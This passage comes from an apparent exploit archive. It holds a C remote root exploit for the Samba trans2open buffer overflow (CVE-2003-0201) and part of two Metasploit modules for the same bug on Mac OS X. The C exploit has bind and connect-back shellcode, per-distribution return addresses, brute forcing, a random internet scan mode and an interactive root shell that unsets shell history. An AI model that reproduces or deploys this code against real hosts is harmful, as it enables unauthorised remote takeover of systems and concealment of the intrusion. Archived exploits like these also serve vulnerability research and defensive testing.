"\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";
char bsd_connect_back[] =
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
"\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
"\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
struct {
char *type;
unsigned long ret;
char *shellcode;
int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */
} targets[] = {
{ "samba-2.2.x - Debian 3.0 ", 0xbffffea2, linux_bindcode, 0 },
{ "samba-2.2.x - Gentoo 1.4.x ", 0xbfffe890, linux_bindcode, 0 },
{ "samba-2.2.x - Mandrake 8.x ", 0xbffff6a0, linux_bindcode, 0 },
{ "samba-2.2.x - Mandrake 9.0 ", 0xbfffe638, linux_bindcode, 0 },
{ "samba-2.2.x - Redhat 9.0 ", 0xbffff7cc, linux_bindcode, 0 },
{ "samba-2.2.x - Redhat 8.0 ", 0xbffff2f0, linux_bindcode, 0 },
{ "samba-2.2.x - Redhat 7.x ", 0xbffff310, linux_bindcode, 0 },
{ "samba-2.2.x - Redhat 6.x ", 0xbffff2f0, linux_bindcode, 0 },
{ "samba-2.2.x - Slackware 9.0 ", 0xbffff574, linux_bindcode, 0 },
{ "samba-2.2.x - Slackware 8.x ", 0xbffff574, linux_bindcode, 0 },
{ "samba-2.2.x - SuSE 7.x ", 0xbffffbe6, linux_bindcode, 0 },
{ "samba-2.2.x - SuSE 8.x ", 0xbffff8f8, linux_bindcode, 0 },
{ "samba-2.2.x - FreeBSD 5.0 ", 0xbfbff374, bsd_bindcode, 1 },
{ "samba-2.2.x - FreeBSD 4.x ", 0xbfbff374, bsd_bindcode, 1 },
{ "samba-2.2.x - NetBSD 1.6 ", 0xbfbfd5d0, bsd_bindcode, 1 },
{ "samba-2.2.x - NetBSD 1.5 ", 0xbfbfd520, bsd_bindcode, 1 },
{ "samba-2.2.x - OpenBSD 3.2 ", 0x00159198, bsd_bindcode, 2 },
{ "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode, 2 },
{ "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode, 2 },
{ "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode, 2 },
{ "Crash (All platforms) ", 0xbade5dee, linux_bindcode, 0 },
};
void shell();
void usage();
void handler();
int is_samba(char *ip, unsigned long time_out);
int Connect(int fd, char *ip, unsigned int port, unsigned int time_out);
int read_timer(int fd, unsigned int time_out);
int write_timer(int fd, unsigned int time_out);
int start_session(int sock);
int exploit_normal(int sock, unsigned long ret, char *shellcode);
int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);
void usage(char *prog)
{
fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n"
"-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"
"-B <step> bruteforce steps (default = 300)\n"
"-c <ip address> connectback ip address\n"
"-C <max childs> max childs for scan/bruteforce mode (default = 40)\n"
"-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)\n"
"-f force\n"
"-p <port> port to attack (default = 139)\n"
"-r <ret> return address\n"
"-s scan mode (random)\n"
"-S <network> scan mode\n"
"-t <type> presets (0 for a list)\n"
"-v verbose mode\n\n", prog);
exit(1);
}
int is_samba(char *ip, unsigned long time_out)
{
char
nbtname[]= /* netbios name packet */
{
0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
0x00,0x01
};
unsigned char recv_buf[1024];
unsigned char *ptr;
int i = 0;
int s = 0;
unsigned int total = 0;
if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;
if(Connect(s, ip, 137, time_out) == -1) {
close(s);
return -1;
}
memset(recv_buf, 0x00, sizeof(recv_buf));
if(write_timer(s, time_out) == 1) {
if (write(s, nbtname, sizeof(nbtname)) <= 0) {
close(s);
return -1;
}
}
if (read_timer(s, time_out) == 1) {
if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {
close(s);
return -1;
}
ptr = recv_buf + 57;
total = *(ptr - 1); /* max names */
while(ptr < recv_buf + sizeof(recv_buf)) {
ptr += 18;
if (i == total) {
ptr -= 19;
if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&
*(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {
close(s);
return 0;
}
close(s);
return 1;
}
i++;
}
}
close(s);
return -1;
}
int Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
{
/* ripped from no1 */
int flags;
int select_status;
fd_set connect_read, connect_write;
struct timeval timeout;
int getsockopt_length = 0;
int getsockopt_error = 0;
struct sockaddr_in server;
bzero(&server, sizeof(server));
server.sin_family = AF_INET;
inet_pton(AF_INET, ip, &server.sin_addr);
server.sin_port = htons(port);
if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
close(fd);
return -1;
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
close(fd);
return -1;
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&connect_read);
FD_ZERO(&connect_write);
FD_SET(fd, &connect_read);
FD_SET(fd, &connect_write);
if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
if(errno != EINPROGRESS) {
close(fd);
return -1;
}
}
else {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);
if(select_status == 0) {
close(fd);
return -1;
}
if(select_status == -1) {
close(fd);
return -1;
}
if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write))
{
getsockopt_length = sizeof(getsockopt_error);
if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
errno = ETIMEDOUT;
close(fd);
return -1;
}
if(getsockopt_error == 0) {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
else {
errno = getsockopt_error;
close(fd);
return (-1);
}
}
}
else {
close(fd);
return 1;
}
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
int read_timer(int fd, unsigned int time_out)
{
/* ripped from no1 */
int flags;
int select_status;
fd_set fdread;
struct timeval timeout;
if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
close(fd);
return (-1);
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&fdread);
FD_SET(fd, &fdread);
select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);
if(select_status == 0) {
close(fd);
return (-1);
}
if(select_status == -1) {
close(fd);
return (-1);
}
if(FD_ISSET(fd, &fdread)) {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
else {
close(fd);
return 1;
}
}
int write_timer(int fd, unsigned int time_out)
{
/* ripped from no1 */
int flags;
int select_status;
fd_set fdwrite;
struct timeval timeout;
if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
close(fd);
return (-1);
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&fdwrite);
FD_SET(fd, &fdwrite);
select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);
if(select_status == 0) {
close(fd);
return -1;
}
if(select_status == -1) {
close(fd);
return -1;
}
if(FD_ISSET(fd, &fdwrite)) {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
else {
close(fd);
return -1;
}
}
void shell(int sock)
{
fd_set fd_read;
char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n";
int n;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);
send(sock, cmd, strlen(cmd), 0);
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;
if (FD_ISSET(sock, &fd_read)) {
if((n = recv(sock, buff, sizeof(buff), 0)) < 0){
fprintf(stderr, "EOF\n");
exit(2);
}
if (write(1, buff, n) < 0) break;
}
if (FD_ISSET(0, &fd_read)) {
if((n = read(0, buff, sizeof(buff))) < 0){
fprintf(stderr, "EOF\n");
exit(2);
}
if (send(sock, buff, n, 0) < 0) break;
}
usleep(10);
}
fprintf(stderr, "Connection lost.\n\n");
exit(0);
}
void handler()
{
int sock = 0;
int i = 0;
OWNED = 1;
for (i = 0; i < 100; i++)
if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0);
if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
close(sock);
exit(1);
}
if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
fprintf(stdout, "+ Worked!\n"
"--------------------------------------------------------------\n");
shell(sock);
close(sock);
}
}
int start_session(int sock)
{
char buffer[1000];
char response[4096];
char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
"\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader;
memset(buffer, 0x00, sizeof(buffer));
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x00;
netbiosheader->length = htons(0x2E);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x73; /* session setup */
smbheader->flags = 0x08; /* caseless pathnames */
smbheader->flags2 = 0x01; /* long filenames supported */
smbheader->pid = getpid() & 0xFFFF;
smbheader->uid = 100;
smbheader->mid = 0x01;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);
if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 50, 0) < 0) return -1;
memset(response, 0x00, sizeof(response));
if (read_timer(sock, 3) == 1)
if (read(sock, response, sizeof(response) - 1) < 0) return -1;
netbiosheader = (NETBIOS_HEADER *)response;
smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
if (netbiosheader->type != 0x00) fprintf(stderr, "+ Received a non session message\n");
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
memset(buffer, 0x00, sizeof(buffer));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x00;
netbiosheader->length = htons(0x3C);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x70; /* start connection */
smbheader->pid = getpid() & 0xFFFF;
smbheader->tid = 0x00;
smbheader->uid = 100;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);
if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 64, 0) < 0) return -1;
memset(response, 0x00, sizeof(response));
if (read_timer(sock, 3) == 1)
if (read(sock, response, sizeof(response) - 1) < 0) return -1;
netbiosheader = (NETBIOS_HEADER *)response;
smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
if (netbiosheader->type != 0x00) return -1;
return 0;
}
int exploit_normal(int sock, unsigned long ret, char *shellcode)
{
char buffer[4000];
char exploit_data[] =
"\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x90";
int i = 0;
unsigned long dummy = ret - 0x90;
NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader;
memset(buffer, 0x00, sizeof(buffer));
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x04;
netbiosheader->length = htons(2096);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x32; /* SMBtrans2 */
smbheader->tid = 0x01;
smbheader->uid = 100;
memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
buffer[1096] = 0xEB;
buffer[1097] = 0x70;
for (i = 0; i < 4 * 24; i += 8) {
memcpy(buffer + 1099 + i, &dummy, 4);
memcpy(buffer + 1103 + i, &ret, 4);
}
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
exploit_data, sizeof(exploit_data) - 1);
memcpy(buffer + 1800, shellcode, strlen(shellcode));
if(write_timer(sock, 3) == 1) {
if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
return 0;
}
return -1;
}
int exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{
char buffer[4000];
char exploit_data[] =
"\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x90";
int i = 0;
unsigned long dummy = ret - 0x30;
NETBIOS_HEADER *netbiosheader;
SMB_HEADER *smbheader;
memset(buffer, 0x00, sizeof(buffer));
netbiosheader = (NETBIOS_HEADER *)buffer;
smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
netbiosheader->type = 0x00; /* session message */
netbiosheader->flags = 0x04;
netbiosheader->length = htons(2096);
smbheader->protocol[0] = 0xFF;
smbheader->protocol[1] = 'S';
smbheader->protocol[2] = 'M';
smbheader->protocol[3] = 'B';
smbheader->command = 0x32; /* SMBtrans2 */
smbheader->tid = 0x01;
smbheader->uid = 100;
memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
for (i = 0; i < 4 * 24; i += 4)
memcpy(buffer + 1131 + i, &dummy, 4);
memcpy(buffer + 1127, &ret, 4);
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
exploit_data, sizeof(exploit_data) - 1);
memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));
if(write_timer(sock, 3) == 1) {
if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
return 0;
}
return -1;
}
int main (int argc,char *argv[])
{
char *shellcode = NULL;
char scan_ip[256];
int brute = -1;
int connectback = 0;
int force = 0;
int i = 0;
int ip1 = 0;
int ip2 = 0;
int ip3 = 0;
int ip4 = 0;
int opt = 0;
int port = 139;
int random = 0;
int scan = 0;
int sock = 0;
int sock2 = 0;
int status = 0;
int type = 0;
int verbose = 0;
unsigned long BRUTE_DELAY = 100000;
unsigned long ret = 0x0;
unsigned long MAX_CHILDS = 40;
unsigned long STEPS = 300;
struct hostent *he;
fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n"
"--------------------------------------------------------------\n");
while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) {
switch(opt)
{
case 'b':
brute = atoi(optarg);
if ((brute < 0) || (brute > 3)) {
fprintf(stderr, "Invalid platform.\n\n");
return -1;
}
break;
case 'B':
STEPS = atoi(optarg);
if (STEPS == 0) STEPS++;
break;
case 'c':
sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
connectback = 1;
if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {
fprintf(stderr, "Invalid IP address.\n\n");
return -1;
}
linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;
linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;
linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;
linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;
break;
case 'C':
MAX_CHILDS = atoi(optarg);
if (MAX_CHILDS == 0) {
fprintf(stderr, "Invalid number of childs.\n");
return -1;
}
if (MAX_CHILDS > 99) {
fprintf(stderr, "Too many childs, using 99. \n");
MAX_CHILDS = 99;
}
break;
case 'd':
BRUTE_DELAY = atoi(optarg);
break;
case 'f':
force = 1;
break;
case 'p':
port = atoi(optarg);
if ((port <= 0) || (port > 65535)) {
fprintf(stderr, "Invalid port.\n\n");
return -1;
}
break;
case 'r':
ret = strtoul(optarg, &optarg, 16);
break;
case 's':
random = 1;
scan = 1;
break;
case 'S':
random = 0;
scan = 1;
sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3);
ip3--;
break;
case 't':
type = atoi(optarg);
if (type == 0 || type > sizeof(targets) / 16) {
for(i = 0; i < sizeof(targets) / 16; i++)
fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1, targets[i].type, (unsigned int) targets[i].ret);
fprintf(stderr, "\n");
return -1;
}
break;
case 'v':
verbose = 1;
break;
default:
usage(argv[0] == NULL ? "sambal" : argv[0]);
break;
}
}
if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0))
usage(argv[0] == NULL ? "sambal" : argv[0]);
if (scan == 1)
fprintf(stdout, "+ Scan mode.\n");
if (verbose == 1)
fprintf(stdout, "+ Verbose mode.\n");
if (scan == 1) {
srand(getpid());
while (1) {
if (random == 1) {
ip1 = rand() % 255;
ip2 = rand() % 255;
ip3 = rand() % 255; }
else {
ip3++;
if (ip3 > 254) { ip3 = 1; ip2++; }
if (ip2 > 254) { ip2 = 1; ip1++; }
if (ip1 > 254) exit(0);
}
for (ip4 = 0; ip4 < 255; ip4++) {
i++;
snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4);
usleep(BRUTE_DELAY);
switch (fork()) {
case 0:
switch(is_samba(scan_ip, 2)) {
case 0:
fprintf(stdout, "+ [%s] Samba\n", scan_ip);
break;
case 1:
fprintf(stdout, "+ [%s] Windows\n", scan_ip);
break;
default:
break;
}
exit(0);
break;
case -1:
fprintf(stderr, "+ fork() error\n");
exit(-1);
break;
default:
if (i > MAX_CHILDS - 2) {
wait(&status);
i--;
}
break;
}
}
}
return 0;
}
he = gethostbyname(argv[optind]);
if (he == NULL) {
fprintf(stderr, "Unable to resolve %s...\n", argv[optind]);
return -1;
}
if (brute == -1) {
if (ret == 0) ret = targets[type - 1].ret;
shellcode = targets[type - 1].shellcode;
if (connectback == 1) {
fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n",
ip1, ip2, ip3, ip4);
switch(targets[type - 1].os_type) {
case 0: /* linux */
shellcode = linux_connect_back;
break;
case 1: /* FreeBSD/NetBSD */
shellcode = bsd_connect_back;
break;
case 2: /* OpenBSD */
shellcode = bsd_connect_back;
break;
case 3: /* OpenBSD 3.2 Non-exec stack */
shellcode = bsd_connect_back;
break;
}
}
if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
fprintf(stderr, "+ socket() error.\n");
return -1;
}
if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
fprintf(stderr, "+ socket() error.\n");
return -1;
}
memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
memcpy(&addr2.sin_addr, he->h_addr, he->h_length);
addr1.sin_family = AF_INET;
addr1.sin_port = htons(port);
addr2.sin_family = AF_INET;
addr2.sin_port = htons(45295);
if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) {
fprintf(stderr, "+ connect() error.\n");
return -1;
}
if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type);
if (force == 0) {
if (is_samba(argv[optind], 2) != 0) {
fprintf(stderr, "+ Host is not running samba!\n\n");
return -1;
}
fprintf(stderr, "+ Host is running samba.\n");
}
if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);
if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n");
if (verbose == 1) fprintf(stdout, "+ Session established\n");
sleep(5);
if (targets[type - 1].os_type != 2) {
if (exploit_normal(sock, ret, shellcode) < 0) {
fprintf(stderr, "+ Failed.\n");
close(sock);
}
} else {
if (exploit_openbsd32(sock, ret, shellcode) < 0) {
fprintf(stderr, "+ Failed.\n");
close(sock);
}
}
sleep(2);
if (connectback == 0) {
if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {
fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n");
return -1;
}
fprintf(stdout, "--------------------------------------------------------------\n");
shell(sock2);
close(sock);
close(sock2);
} else {
fprintf(stdout, "+ Done...\n");
close(sock2);
close(sock);
}
return 0;
}
signal(SIGPIPE, SIG_IGN);
signal(SIGUSR1, handler);
switch(brute) {
case 0:
if (ret == 0) ret = 0xc0000000;
shellcode = linux_bindcode;
fprintf(stdout, "+ Bruteforce mode. (Linux)\n");
break;
case 1:
if (ret == 0) ret = 0xbfc00000;
shellcode = bsd_bindcode;
fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n");
break;
case 2:
if (ret == 0) ret = 0xdfc00000;
shellcode = bsd_bindcode;
fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n");
break;
case 3:
if (ret == 0) ret = 0x00170000;
shellcode = bsd_bindcode;
fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n");
break;
}
memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
memcpy(&addr2.sin_addr, he->h_addr, he->h_length);
addr1.sin_family = AF_INET;
addr1.sin_port = htons(port);
addr2.sin_family = AF_INET;
addr2.sin_port = htons(45295);
for (i = 0; i < 100; i++)
childs[i] = -1;
i = 0;
if (force == 0) {
if (is_samba(argv[optind], 2) != 0) {
fprintf(stderr, "+ Host is not running samba!\n\n");
return -1;
}
fprintf(stderr, "+ Host is running samba.\n");
}
while (OWNED == 0) {
if (sock > 2) close(sock);
if (sock2 > 2) close(sock2);
if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
}
else {
ret -= STEPS;
i++;
}
if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)
if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
if ((ret & 0xff) == 0x00 && brute != 3) ret++;
if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret);
usleep(BRUTE_DELAY);
switch (childs[i] = fork()) {
case 0:
if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {
if (sock > 2) close(sock);
if (sock2 > 2) close(sock2);
exit(-1);
}
if(write_timer(sock, 3) == 1) {
if (start_session(sock) < 0) {
if (verbose == 1) fprintf(stderr, "+ Session failed.\n");
if (sock > 2)close(sock);
if (sock2 > 2) close(sock2);
exit(-1);
}
if (brute == 3) {
if (exploit_openbsd32(sock, ret, shellcode) < 0) {
if (verbose == 1) fprintf(stderr, "+ Failed.\n");
if (sock > 2) close(sock);
if (sock2 > 2) close(sock2);
exit(-1);
}
}
else {
if (exploit_normal(sock, ret, shellcode) < 0) {
if (verbose == 1) fprintf(stderr, "+ Failed.\n");
if (sock > 2) close(sock);
if (sock2 > 2) close(sock2);
exit(-1);
}
if (sock > 2) close(sock);
if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
if (sock2 > 2) close(sock2);
exit(-1);
}
if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
if (sock2 > 2) close(sock2);
kill(getppid(), SIGUSR1);
}
exit(1);
}
exit(0);
break;
case -1:
fprintf(stderr, "+ fork() error\n");
exit(-1);
break;
default:
if (i > MAX_CHILDS - 2) {
wait(&status);
i--;
}
break;
}
}
}
return 0;
}
// milw0rm.com [2003-04-10]
Exploit Database EDB-ID: 9924
Publication date: 2003-04-06 22:00 +00:00
Author: H D Moore
EDB Verified: Yes
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba trans2open Overflow (Mac OS X)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the bug on Mac OS X PowerPC systems.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2003-0201'],
[ 'OSVDB', '4469'],
[ 'BID', '7294'],
[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
},
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Targets' =>
[
['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],
],
'DisclosureDate' => 'Apr 7 2003',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(139)
], self.class)
end
# Need to perform target detection
def autofilter
false
end
def exploit
curr_ret = target['Rets'][0]
while (curr_ret >= target['Rets'][1])
break if session_created?
begin
print_status("Trying return address 0x%.8x..." % curr_ret)
connect
smb_login
# 1988 is required for findrecv shellcode
pattern = rand_text_english(1988)
# This stream covers the framepointer and the return address
pattern[1195, 64] = [curr_ret].pack('N') * 16
# Stuff the shellcode into the request
pattern[3, payload.encoded.length] = payload.encoded
trans =
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
pattern
sock.put(trans)
handler
disconnect
rescue EOFError
rescue => e
print_status("Caught exception: #{e}")
break
end
curr_ret -= target['Rets'][2]
end
end
end
Exploit Database EDB-ID: 16876
Publication date: 2010-06-20 22:00 +00:00
Author: Metasploit
EDB Verified: Yes
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SMB
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba trans2open Overflow (Mac OS X PPC)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the bug on Mac OS X PowerPC systems.
},
'Author' => [ 'hdm', 'jduck' ],
'Version' => '$Revision: 9571 $',
'References' =>
[
[ 'CVE', '2003-0201' ],
[ 'OSVDB', '4469' ],
[ 'BID', '7294' ],
